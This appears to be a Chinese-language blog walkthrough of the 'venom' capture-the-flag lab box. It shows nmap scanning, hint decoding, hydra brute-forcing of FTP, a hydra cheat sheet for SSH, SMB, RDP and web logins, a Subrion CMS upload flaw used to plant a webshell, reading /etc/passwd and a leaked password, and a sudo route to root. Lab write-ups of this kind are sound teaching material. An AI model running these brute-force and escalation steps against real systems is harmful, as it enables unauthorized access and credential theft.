venom

信息搜集

扫描网段

nmap -sn 192.168.244.0/24

检测存活ip，跳过端口扫描

┌──(ma5k㉿localhost)-[~]
└─$ nmap -sn 192.168.244.0/24                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 18:31 CST
Nmap scan report for localhost (192.168.244.85)
Host is up (0.00038s latency).
MAC Address: 00:0C:29:49:F0:E7 (VMware)
Nmap scan report for localhost (192.168.244.105)
Host is up (0.0042s latency).
MAC Address: D2:E8:87:FB:35:B2 (Unknown)
Nmap scan report for localhost (192.168.244.152)
Host is up (0.00018s latency).
MAC Address: AC:19:8E:9B:57:53 (Intel Corporate)
Nmap scan report for localhost (192.168.244.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds

目标ip：192.168.244.85

nmap -p- -sV -sT -O 192.168.244.85

-p-: 65535全端口 -sV service version

-sT 完整 TCP 三次握手（SYN → SYN/ACK → ACK）

-O 操作系统指纹识别（OS detection）

┌──(ma5k㉿localhost)-[~]
└─$ nmap -p- -sV -sT -O 192.168.244.85
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 18:35 CST
Nmap scan report for localhost (192.168.244.85)
Host is up (0.00051s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  http        Apache httpd 2.4.29
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:49:F0:E7 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Hosts: VENOM, 127.0.1.1; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds

http

先从http入手，apache初始页面

常规扫目录：dirb http://192.168.244.85/

无果，分析网页源码：

5f2a66f947fa5690c26506f66bde5c23

┌──(ma5k㉿localhost)-[~]
└─$ hashid 5f2a66f947fa5690c26506f66bde5c23
Analyzing '5f2a66f947fa5690c26506f66bde5c23'
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x

hostinger

ftp

ftp 192.168.244.85

cewl（Custom Word List generator）是一个开源的信息收集工具，主要用于从目标网站中爬取内容并生成自定义密码字典

hydra（全名：THC-Hydra）是由 The Hacker Choice (THC) 开发的一款快速、灵活、支持多协议的网络登录爆破工具，广泛用于渗透测试中的凭证猜测攻击

插曲.eg

cewl -d 4 -m 4 -e -a --meta_file meta.txt \
  -H "User-Agent: CustomBot" \
  http://target.local \
  -w target_wordlist.txt
  
cewl \
  -d 4 \                          # 设置爬取深度为 4 层（从首页开始最多跟进 4 层链接）
  -m 4 \                          # 仅提取长度 ≥4 个字符的单词（过滤过短无意义词）
  -e \                            # 启用电子邮件地址提取（如 user@target.local）
  -a \                            # 启用元数据（metadata）提取（如 author、description 等 <meta> 标签内容）
  --meta_file meta.txt \          # 将提取的元数据单独保存到文件 meta.txt
  -H "User-Agent: CustomBot" \    # 自定义 HTTP 请求头：设置 User-Agent 为 "CustomBot"
  http://target.local \           # 目标网站 URL（要爬取的起始地址）
  -w target_wordlist.txt          # 将生成的单词列表（字典）输出到文件 target_wordlist.txt

hydra -t 线程数 -vV 详细过程

# ftp
hydra -L user.txt -P pass.txt -t 4 -vV -o ftp_result.txt 192.168.1.10 ftp

# ssh
hydra -L user.txt -P pass.txt -t 4 -vV -o ssh_result.txt ssh://192.168.1.10
# 指定非默认端口（如 2222）
hydra -L user.txt -P pass.txt -s 2222 -t 4 ssh://192.168.1.10

#telnet
hydra -L user.txt -P pass.txt -t 2 -vV telnet://192.168.1.10

# mysql
hydra -L user.txt -P pass.txt -t 4 mysql://192.168.1.10

# postgresql
hydra -L user.txt -P pass.txt -t 4 postgres://192.168.1.10

# smb(Windows 共享/NetBIOS)
hydra -L user.txt -P pass.txt -t 4 -vV smb://192.168.1.10

# rdp(远程桌面)
hydra -L user.txt -P pass.txt -t 2 rdp://192.168.1.10

# redis
hydra -P pass.txt redis://192.168.1.10
# Redis 通常无用户名，只爆破密码

Web 表单登录爆破

# 通用格式：
hydra -l <USER> -P <PASS_FILE> <IP> http-post-form \
  "/login_path:param_user=^USER^&param_pass=^PASS^:错误提示"

# 通用 Web 登录
hydra -l admin -P pass.txt 192.168.1.10 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:Invalid credentials"

# WordPress 后台
hydra -l admin -P pass.txt 192.168.1.10 http-post-form \
  "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect"

# 带 Cookie 和 POST 头
hydra -l test -P pass.txt 192.168.1.10 http-post-form \
  "/auth:email=^USER^&passwd=^PASS^:F=Login failed" \
  -H "User-Agent: Mozilla/5.0" \
  -H "Cookie: sessionid=abc123"

cewl http://192.168.244.85 -w passwd.txt

hydra -l hostinger -P passwd.txt -t 5 -vV -o success.txt -e ns 192.168.244.85 ftp

爆出密码登录

hostinger / hostinger

lftp ftp://hostinger:hostinger@192.168.244.85

解密

lftp hostinger@192.168.244.85:/> ls -hail
dr-xr-xr-x    3 65534    65534        4096 May 20  2021 .
dr-xr-xr-x    3 65534    65534        4096 May 20  2021 ..
drwxr-xr-x    2 1002     1002         4096 May 21  2021 files

lftp hostinger@192.168.244.85:/files> cat hint.txt 
        Hey there... 

T0D0 --

* You need to follow the 'hostinger' 
on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= 
also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password 


Have fun .. :)

eg. echo “….” | base64 -d

可以下载：get hint.txt

Base混合多重解码:
[解码3次] Base64 -> Base64 -> Base64
混合解码结果:standard vigenere cipher

┌──(ma5k㉿localhost)-[~]
└─$ echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d
https://cryptii.com/pipes/vigenere-cipher

维吉尼亚，key为hostinger

1
2
3

明文：HELLO
密钥：KEY → 循环扩展为 KEYKE
加密：H+K, E+E, L+Y, L+K, O+E → 得到密文

E7r9t8@Q#h%Hy+M1234

venom.box

提示内容：try on venom.box

一开始没想明白，整合了下，已知靶机ip,得到一个密码，ip无法直接访问，结合Apache，Nginx，那就配置域名访问

“Web 服务器通过 Host 头认人，IP 没‘名字’，所以被拒之门外。”

管理员 notebook.exe

C:\Windows\System32\drivers\etc\hosts

192.168.244.85 venom.box

刷新dns缓存

ipconfig /flushdns ping/nslook

常规还是爆破遍历：python .\dirsearch.py -u http://venom.box/ -o rs.txt

CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

一个上传页面：http://venom.box/panel/uploads/

爆用户名

dora / E7r9t8@Q#h%Hy+M1234

传马

后渗透

进后台继续搞Subrion

/var/www/html/subrion/uploads/ >ls -hail

total 32K
 538489 drwxr-xr-x  4 www-data www-data 4.0K Nov 24 15:47 .
1190802 drwxr-xr-x 13 www-data www-data 4.0K May 21  2021 ..
 538490 -rwxr-xr-x  1 www-data www-data  656 Jun 14  2018 .htaccess
 538784 drwxr-xr-x  2 www-data www-data 4.0K May 20  2021 .quarantine
 538783 drwxrwxrwx  2 www-data www-data 4.0K May 20  2021 .tmb
 526453 -rw-r--r--  1 www-data www-data   29 Nov 24 15:35 1.php
 536773 -rw-r--r--  1 www-data www-data   30 Nov 24 15:47 gsl.phar
 526454 -rw-r--r--  1 www-data www-data   35 Nov 24 15:40 system.pht

/var/www/html/subrion >ls -hail

total 180K
1190802 drwxr-xr-x 13 www-data www-data 4.0K May 21  2021 .
1190429 drwxr-xr-x  3 root     root     4.0K May 20  2021 ..
1191377 -rwxr-xr-x  1 www-data www-data  247 Jun 14  2018 .gitignore
1191378 -rwxr-xr-x  1 www-data www-data 2.3K Jun 14  2018 .htaccess
1191381 -rwxr-xr-x  1 www-data www-data 4.0K Jun 14  2018 CONTRIBUTING.md
1191385 -rwxr-xr-x  1 www-data www-data 4.7K Jun 14  2018 README.md
1190843 drwxr-xr-x  3 www-data www-data 4.0K May 20  2021 admin
1191155 drwxr-xr-x  2 www-data www-data 4.0K May 21  2021 backup
1191379 -rwxr-xr-x  1 www-data www-data  49K Jun 14  2018 changelog.txt
1191380 -rwxr-xr-x  1 www-data www-data  694 Jun 14  2018 composer.json
1191382 -rwxr-xr-x  1 www-data www-data 1.2K Jun 14  2018 favicon.ico
1191157 drwxr-xr-x  2 www-data www-data 4.0K Jun 14  2018 front
1191173 drwxr-xr-x 17 www-data www-data 4.0K May 20  2021 includes
1191383 -rwxr-xr-x  1 www-data www-data 4.1K Jun 14  2018 index.php
1191348 drwxr-xr-x  6 www-data www-data 4.0K Jun 14  2018 install
 411391 drwxr-xr-x 13 www-data www-data 4.0K Jun 14  2018 js
1191384 -rwxr-xr-x  1 www-data www-data  35K Jun 14  2018 license.txt
 411392 drwxr-xr-x  5 www-data www-data 4.0K Jun 14  2018 modules
1191386 -rwxr-xr-x  1 www-data www-data   41 May 21  2021 robots.txt
 411470 drwxr-xr-x  4 www-data www-data 4.0K Jun 14  2018 templates
 538485 drwxr-xr-x  7 www-data www-data 4.0K May 20  2021 tmp
 538487 drwxr-xr-x  2 www-data www-data 4.0K Jun 14  2018 updates
 538489 drwxr-xr-x  4 www-data www-data 4.0K Nov 24 15:47 uploads

看到backup备份，.htaccess

1
2
3

allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

/etc/passwd 是 Unix 和类 Unix 操作系统（如 Linux）中一个非常重要的系统文件，用于存储用户账户的基本信息。尽管名字里有 “passwd”（密码），但现代系统中它并不保存用户密码本身（密码通常保存在 /etc/shadow 中，且只有 root 可读）

到这一步一般就是用户转移，提权处理，权限问题

发现nathan

geoclue:x:118:122::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:119:123:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false

nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash

vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:123:128:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash

sudo /bin/bash 直接以 root 身份启动一个 Bash shell。

sudo su 先用 sudo 执行 su（switch user）命令，默认切换到 root 用户，再由 su 启动 shell。

su nathan
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
sudo -l

Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su

sudo /bin/bash

root@venom:/var/www/html/subrion/uploads# cd /root
root@venom:/root# ls -hail
total 64K
1177346 drwx------  7 root root 4.0K May 21  2021 .
      2 drwxr-xr-x 24 root root 4.0K May 20  2021 ..
1184378 -rw-------  1 root root  20K May 22  2021 .bash_history
1177363 -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
1177362 drwx------  2 root root 4.0K Aug  7  2020 .cache
1190844 drwx------  4 root root 4.0K May 21  2021 .config
1184238 drwx------  3 root root 4.0K May 20  2021 .gnupg
1190291 drwxr-xr-x  3 root root 4.0K May 20  2021 .local
1190661 -rw-------  1 root root  201 May 20  2021 .mysql_history
1177364 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
1191636 -rw-r--r--  1 root root   29 May 21  2021 root.txt
1191655 drwxr-xr-x  6 root root 4.0K May 21  2021 snap
root@venom:/root# cat root.txt 
#root_flag
H@v3_a_n1c3_l1fe.

杂记

复现源：https://www.freebuf.com/defense/394169.html

venom靶机历史感略重，vm改不了设置，运行照旧，靶机名字有点意思，相较于第一次跳度挺大

Web

venom

https://alenirving.github.io/2025/11/24/venom/

作者

Ma5k

许可协议

CC-BY-NC-SA

blutter配置与使用上一篇

浙江省赛决赛2025_Re 下一篇